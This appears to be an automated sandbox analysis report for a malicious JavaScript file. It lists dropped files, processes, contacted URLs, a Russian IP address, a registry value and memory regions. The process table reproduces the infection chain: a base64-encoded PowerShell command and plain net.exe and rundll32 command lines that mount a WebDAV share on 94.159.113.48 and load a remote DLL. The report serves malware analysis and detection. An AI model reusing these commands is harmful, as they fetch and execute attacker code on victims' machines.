Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
634624051181209037.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ptl4kggm.me0.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnf1x5ra.alu.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\634624051181209037.js"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANAA4AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADQAOABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMwAxADgANQAyADIANQA4ADkAMAAxADAAMAAyADYALgBkAGwAbAAsAEUAbgB0AHIAeQA=
|
||
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\94.159.113.48@8888\davwwwroot\318522589010026.dll,Entry
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\94.159.113.48@8888\davwwwroot\
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://94.159.113.48:8888/U
|
unknown
|
||
http://94.159.113.48:8888/pace
|
unknown
|
||
https://aka.ms/pscore6
|
unknown
|
||
http://www.microsoft.2
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://94.159.113.48:8888/
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
94.159.113.48
|
unknown
|
Russian Federation
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1DEF66DE000
|
heap
|
page read and write
|
||
1DEF81E3000
|
heap
|
page read and write
|
||
7FFB22715000
|
unkown
|
page readonly
|
||
1DEF81E0000
|
heap
|
page read and write
|
||
1DEF820C000
|
heap
|
page read and write
|
||
7FFAAC800000
|
trusted library allocation
|
page read and write
|
||
1DEF63E3000
|
heap
|
page read and write
|
||
27415B60000
|
heap
|
page read and write
|
||
A73B1FE000
|
stack
|
page read and write
|
||
1DEF66DD000
|
heap
|
page read and write
|
||
7FFAAC5F6000
|
trusted library allocation
|
page read and write
|
||
22D56577000
|
heap
|
page execute and read and write
|
||
7FFAAC600000
|
trusted library allocation
|
page execute and read and write
|
||
1DEF6462000
|
heap
|
page read and write
|
||
A9B5AFE000
|
stack
|
page read and write
|
||
1DEF647C000
|
heap
|
page read and write
|
||
1DEF6499000
|
heap
|
page read and write
|
||
1DEF645B000
|
heap
|
page read and write
|
||
27415EA4000
|
heap
|
page read and write
|
||
7FFB22730000
|
unkown
|
page readonly
|
||
1CDFE782000
|
heap
|
page read and write
|
||
1CDFE750000
|
heap
|
page read and write
|
||
27418EF0000
|
heap
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
7FFB22706000
|
unkown
|
page readonly
|
||
A73B7FF000
|
stack
|
page read and write
|
||
1DEF81C4000
|
heap
|
page read and write
|
||
7FFAAC7D0000
|
trusted library allocation
|
page read and write
|
||
1DEF81EA000
|
heap
|
page read and write
|
||
7FFB22750000
|
unkown
|
page read and write
|
||
1DEF81F7000
|
heap
|
page read and write
|
||
27415B89000
|
heap
|
page read and write
|
||
1CDFE77C000
|
heap
|
page read and write
|
||
22D6EDE0000
|
heap
|
page read and write
|
||
1DEF8315000
|
heap
|
page read and write
|
||
A9B55DE000
|
stack
|
page read and write
|
||
1DEF66DC000
|
heap
|
page read and write
|
||
27418EF3000
|
heap
|
page read and write
|
||
A9B5B3E000
|
stack
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
1DEF8218000
|
heap
|
page read and write
|
||
1DEF81EA000
|
heap
|
page read and write
|
||
27415B76000
|
heap
|
page read and write
|
||
5FDF2FF000
|
stack
|
page read and write
|
||
1DEF6460000
|
heap
|
page read and write
|
||
22D56F1A000
|
trusted library allocation
|
page read and write
|
||
1CDFE7B8000
|
heap
|
page read and write
|
||
7FFAAC790000
|
trusted library allocation
|
page read and write
|
||
22D6ECD0000
|
heap
|
page read and write
|
||
22D54EE5000
|
heap
|
page read and write
|
||
1DEF6499000
|
heap
|
page read and write
|
||
22D54C42000
|
heap
|
page read and write
|
||
22D56B0B000
|
trusted library allocation
|
page read and write
|
||
1DEF8213000
|
heap
|
page read and write
|
||
22D56DB0000
|
trusted library allocation
|
page read and write
|
||
1DEF641A000
|
heap
|
page read and write
|
||
7DF4C6820000
|
trusted library allocation
|
page execute and read and write
|
||
1DEF81E0000
|
heap
|
page read and write
|
||
E31C2FE000
|
stack
|
page read and write
|
||
A73B6FF000
|
stack
|
page read and write
|
||
22D66A71000
|
trusted library allocation
|
page read and write
|
||
7FFB22746000
|
unkown
|
page readonly
|
||
7FFAAC810000
|
trusted library allocation
|
page read and write
|
||
22D54C7B000
|
heap
|
page read and write
|
||
27415B61000
|
heap
|
page read and write
|
||
5FDF07B000
|
stack
|
page read and write
|
||
22D56BC6000
|
trusted library allocation
|
page read and write
|
||
1CDFE7AC000
|
heap
|
page read and write
|
||
7FFAAC5F0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7C0000
|
trusted library allocation
|
page read and write
|
||
1DEF6467000
|
heap
|
page read and write
|
||
22D6F0B0000
|
heap
|
page read and write
|
||
1DEF81E6000
|
heap
|
page read and write
|
||
22D56B8F000
|
trusted library allocation
|
page read and write
|
||
27415EAB000
|
heap
|
page read and write
|
||
1DEF81E2000
|
heap
|
page read and write
|
||
7FFAAC860000
|
trusted library allocation
|
page read and write
|
||
A9B5C39000
|
stack
|
page read and write
|
||
7FFAAC7E0000
|
trusted library allocation
|
page read and write
|
||
1DEF6300000
|
heap
|
page read and write
|
||
7FFAAC700000
|
trusted library allocation
|
page execute and read and write
|
||
1CDFE6B0000
|
heap
|
page read and write
|
||
27415B65000
|
heap
|
page read and write
|
||
1DEF6499000
|
heap
|
page read and write
|
||
22D56B74000
|
trusted library allocation
|
page read and write
|
||
7FFAAC542000
|
trusted library allocation
|
page read and write
|
||
A9B5D3E000
|
stack
|
page read and write
|
||
22D56B77000
|
trusted library allocation
|
page read and write
|
||
1CDFE6A0000
|
heap
|
page read and write
|
||
1CDFE78D000
|
heap
|
page read and write
|
||
22D54CB7000
|
heap
|
page read and write
|
||
7FFAAC710000
|
trusted library allocation
|
page execute and read and write
|
||
22D56580000
|
heap
|
page read and write
|
||
1DEF62D0000
|
heap
|
page read and write
|
||
7FFAAC820000
|
trusted library allocation
|
page read and write
|
||
A9B54D3000
|
stack
|
page read and write
|
||
7FFB226F1000
|
unkown
|
page execute read
|
||
1DEF66D9000
|
heap
|
page read and write
|
||
22D6EBC5000
|
heap
|
page read and write
|
||
22D56A8B000
|
trusted library allocation
|
page read and write
|
||
1DEF81C7000
|
heap
|
page read and write
|
||
7FFAAC543000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB22710000
|
unkown
|
page read and write
|
||
1DEF81FC000
|
heap
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
5FDF27C000
|
stack
|
page read and write
|
||
1DEF8210000
|
heap
|
page read and write
|
||
1DEF641A000
|
heap
|
page read and write
|
||
1DEF6390000
|
heap
|
page read and write
|
||
22D6EDB0000
|
heap
|
page execute and read and write
|
||
1DEF81E0000
|
heap
|
page read and write
|
||
7FFAAC840000
|
trusted library allocation
|
page read and write
|
||
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
1DEF62E0000
|
heap
|
page read and write
|
||
1DEF6499000
|
heap
|
page read and write
|
||
22D569B0000
|
heap
|
page execute and read and write
|
||
22D54C00000
|
heap
|
page read and write
|
||
1DEF8315000
|
heap
|
page read and write
|
||
A9B555F000
|
stack
|
page read and write
|
||
A9B5EBE000
|
stack
|
page read and write
|
||
1DEF6470000
|
heap
|
page read and write
|
||
22D6EC61000
|
heap
|
page read and write
|
||
22D6EC76000
|
heap
|
page read and write
|
||
27415B8C000
|
heap
|
page read and write
|
||
1DEF81EC000
|
heap
|
page read and write
|
||
22D56A60000
|
heap
|
page read and write
|
||
1CDFE720000
|
remote allocation
|
page read and write
|
||
1DEF648F000
|
heap
|
page read and write
|
||
1DEF6499000
|
heap
|
page read and write
|
||
22D54C77000
|
heap
|
page read and write
|
||
22D54B00000
|
heap
|
page read and write
|
||
1DEF8213000
|
heap
|
page read and write
|
||
22D56500000
|
heap
|
page read and write
|
||
27417650000
|
heap
|
page read and write
|
||
1CDFE786000
|
heap
|
page read and write
|
||
22D54C8F000
|
heap
|
page read and write
|
||
1DEF81FA000
|
heap
|
page read and write
|
||
22D56550000
|
trusted library allocation
|
page read and write
|
||
22D56ADE000
|
trusted library allocation
|
page read and write
|
||
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
27415B81000
|
heap
|
page read and write
|
||
7FFAAC544000
|
trusted library allocation
|
page read and write
|
||
1DEF66D5000
|
heap
|
page read and write
|
||
27415EA0000
|
heap
|
page read and write
|
||
7FFB22731000
|
unkown
|
page execute read
|
||
7FFAAC850000
|
trusted library allocation
|
page read and write
|
||
1DEF81E7000
|
heap
|
page read and write
|
||
22D54EE0000
|
heap
|
page read and write
|
||
1DEF66D9000
|
heap
|
page read and write
|
||
1DEF6460000
|
heap
|
page read and write
|
||
1DEF81C6000
|
heap
|
page read and write
|
||
27415AF0000
|
heap
|
page read and write
|
||
27415B4E000
|
heap
|
page read and write
|
||
22D54BE0000
|
heap
|
page read and write
|
||
22D6EBE1000
|
heap
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
22D54D13000
|
heap
|
page read and write
|
||
22D56530000
|
trusted library allocation
|
page read and write
|
||
1DEF8342000
|
heap
|
page read and write
|
||
1DEF648F000
|
heap
|
page read and write
|
||
22D54C30000
|
heap
|
page read and write
|
||
A9B5BB7000
|
stack
|
page read and write
|
||
7FFAAC660000
|
trusted library allocation
|
page execute and read and write
|
||
22D6EBEF000
|
heap
|
page read and write
|
||
1DEF81E0000
|
heap
|
page read and write
|
||
1DEF648F000
|
heap
|
page read and write
|
||
22D56A71000
|
trusted library allocation
|
page read and write
|
||
1DEF81F2000
|
heap
|
page read and write
|
||
27415B5C000
|
heap
|
page read and write
|
||
22D56B7A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
1DEF81E0000
|
heap
|
page read and write
|
||
A9B587F000
|
stack
|
page read and write
|
||
1DEF6473000
|
heap
|
page read and write
|
||
1DEF6469000
|
heap
|
page read and write
|
||
1DEF81D5000
|
heap
|
page read and write
|
||
1CDFE730000
|
heap
|
page read and write
|
||
1DEF648F000
|
heap
|
page read and write
|
||
22D6EC30000
|
heap
|
page read and write
|
||
1DEF6485000
|
heap
|
page read and write
|
||
1CDFE734000
|
heap
|
page read and write
|
||
7FFAAC7B0000
|
trusted library allocation
|
page read and write
|
||
1DEF6478000
|
heap
|
page read and write
|
||
5FDF1FE000
|
stack
|
page read and write
|
||
27415AE0000
|
heap
|
page read and write
|
||
27415B5C000
|
heap
|
page read and write
|
||
1DEF648F000
|
heap
|
page read and write
|
||
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
1DEF66DD000
|
heap
|
page read and write
|
||
1CDFE720000
|
remote allocation
|
page read and write
|
||
22D66A80000
|
trusted library allocation
|
page read and write
|
||
1DEF6460000
|
heap
|
page read and write
|
||
A9B5CBB000
|
stack
|
page read and write
|
||
7FFAAC6F1000
|
trusted library allocation
|
page read and write
|
||
1DEF6465000
|
heap
|
page read and write
|
||
1DEF66DE000
|
heap
|
page read and write
|
||
A9B5A7E000
|
stack
|
page read and write
|
||
22D56B8B000
|
trusted library allocation
|
page read and write
|
||
22D6EC5C000
|
heap
|
page read and write
|
||
A73B9FD000
|
stack
|
page read and write
|
||
27415B6D000
|
heap
|
page read and write
|
||
1DEF8224000
|
heap
|
page read and write
|
||
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
1DEF81E7000
|
heap
|
page read and write
|
||
1DEF81E5000
|
heap
|
page read and write
|
||
7FFAAC5FC000
|
trusted library allocation
|
page execute and read and write
|
||
1DEF63CD000
|
heap
|
page read and write
|
||
1DEF648F000
|
heap
|
page read and write
|
||
22D56940000
|
trusted library allocation
|
page read and write
|
||
7FFAAC780000
|
trusted library allocation
|
page read and write
|
||
22D56E2E000
|
trusted library allocation
|
page read and write
|
||
1DEF81F2000
|
heap
|
page read and write
|
||
7FFAAC626000
|
trusted library allocation
|
page execute and read and write
|
||
22D6EB80000
|
heap
|
page read and write
|
||
1DEF6462000
|
heap
|
page read and write
|
||
A73BBFB000
|
stack
|
page read and write
|
||
22D54C73000
|
heap
|
page read and write
|
||
27415B48000
|
heap
|
page read and write
|
||
A9B5AF8000
|
stack
|
page read and write
|
||
A73B0F5000
|
stack
|
page read and write
|
||
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
22D6ECB0000
|
heap
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
7FFAAC550000
|
trusted library allocation
|
page read and write
|
||
1DEF6476000
|
heap
|
page read and write
|
||
1DEF8275000
|
heap
|
page read and write
|
||
22D66ADE000
|
trusted library allocation
|
page read and write
|
||
22D6EBBE000
|
heap
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
27415B10000
|
heap
|
page read and write
|
||
7FFB22752000
|
unkown
|
page readonly
|
||
A9B59FF000
|
stack
|
page read and write
|
||
A73B2FF000
|
stack
|
page read and write
|
||
7FFAAC6FA000
|
trusted library allocation
|
page read and write
|
||
22D54C6F000
|
heap
|
page read and write
|
||
1DEF81EE000
|
heap
|
page read and write
|
||
27419390000
|
trusted library allocation
|
page read and write
|
||
1DEF647B000
|
heap
|
page read and write
|
||
7FFAAC722000
|
trusted library allocation
|
page read and write
|
||
22D56585000
|
heap
|
page read and write
|
||
27418EB0000
|
heap
|
page read and write
|
||
1DEF82C1000
|
heap
|
page read and write
|
||
7FFAAC54D000
|
trusted library allocation
|
page execute and read and write
|
||
1CDFE757000
|
heap
|
page read and write
|
||
22D54CBD000
|
heap
|
page read and write
|
||
1DEF81C5000
|
heap
|
page read and write
|
||
22D56570000
|
heap
|
page execute and read and write
|
||
A9B5DBE000
|
stack
|
page read and write
|
||
1DEF6486000
|
heap
|
page read and write
|
||
1DEF63A0000
|
heap
|
page read and write
|
||
7FFB22755000
|
unkown
|
page readonly
|
||
1CDFE6D0000
|
heap
|
page read and write
|
||
22D56B88000
|
trusted library allocation
|
page read and write
|
||
A9B58FD000
|
stack
|
page read and write
|
||
7FFAAC830000
|
trusted library allocation
|
page read and write
|
||
22D56F74000
|
trusted library allocation
|
page read and write
|
||
A73B5FE000
|
stack
|
page read and write
|
||
22D56ABF000
|
trusted library allocation
|
page read and write
|
||
1DEF81EF000
|
heap
|
page read and write
|
||
1DEF81C8000
|
heap
|
page read and write
|
||
1DEF6462000
|
heap
|
page read and write
|
||
E31C37E000
|
stack
|
page read and write
|
||
1CDFE7BF000
|
heap
|
page read and write
|
||
1DEF6499000
|
heap
|
page read and write
|
||
1CDFE784000
|
heap
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
1DEF822B000
|
heap
|
page read and write
|
||
1DEF66D0000
|
heap
|
page read and write
|
||
27415B40000
|
heap
|
page read and write
|
||
1DEF66DB000
|
heap
|
page read and write
|
||
A9B5F3C000
|
stack
|
page read and write
|
||
1DEF8213000
|
heap
|
page read and write
|
||
1DEF81E2000
|
heap
|
page read and write
|
||
A9B597E000
|
stack
|
page read and write
|
||
E31C27A000
|
stack
|
page read and write
|
||
22D56AD8000
|
trusted library allocation
|
page read and write
|
||
22D6EB85000
|
heap
|
page read and write
|
||
1DEF81F1000
|
heap
|
page read and write
|
||
1CDFE7A6000
|
heap
|
page read and write
|
||
7FFB22712000
|
unkown
|
page readonly
|
||
1CDFE78F000
|
heap
|
page read and write
|
||
27415B70000
|
heap
|
page read and write
|
||
22D56DF7000
|
trusted library allocation
|
page read and write
|
||
1DEF6425000
|
heap
|
page read and write
|
||
A73B3FD000
|
stack
|
page read and write
|
||
1DEF81C2000
|
heap
|
page read and write
|
||
1DEF81EA000
|
heap
|
page read and write
|
||
A73B8FE000
|
stack
|
page read and write
|
||
7FFAAC730000
|
trusted library allocation
|
page execute and read and write
|
||
A9B5E3E000
|
stack
|
page read and write
|
||
5FDF17E000
|
stack
|
page read and write
|
||
1DEF8200000
|
heap
|
page read and write
|
||
1DEF81CD000
|
heap
|
page read and write
|
||
22D56BCD000
|
trusted library allocation
|
page read and write
|
||
1DEF646A000
|
heap
|
page read and write
|
||
1DEF81FA000
|
heap
|
page read and write
|
||
1DEF66DE000
|
heap
|
page read and write
|
||
1DEF82C0000
|
heap
|
page read and write
|
||
1DEF63CE000
|
heap
|
page read and write
|
||
1DEF81DC000
|
heap
|
page read and write
|
||
7FFB226F0000
|
unkown
|
page readonly
|
||
1CDFE720000
|
remote allocation
|
page read and write
|
||
22D56560000
|
heap
|
page readonly
|
||
5FDF0FE000
|
stack
|
page read and write
|
||
7FFAAC7F0000
|
trusted library allocation
|
page read and write
|
||
1DEF81C0000
|
heap
|
page read and write
|
There are 296 hidden memdumps, click here to show them.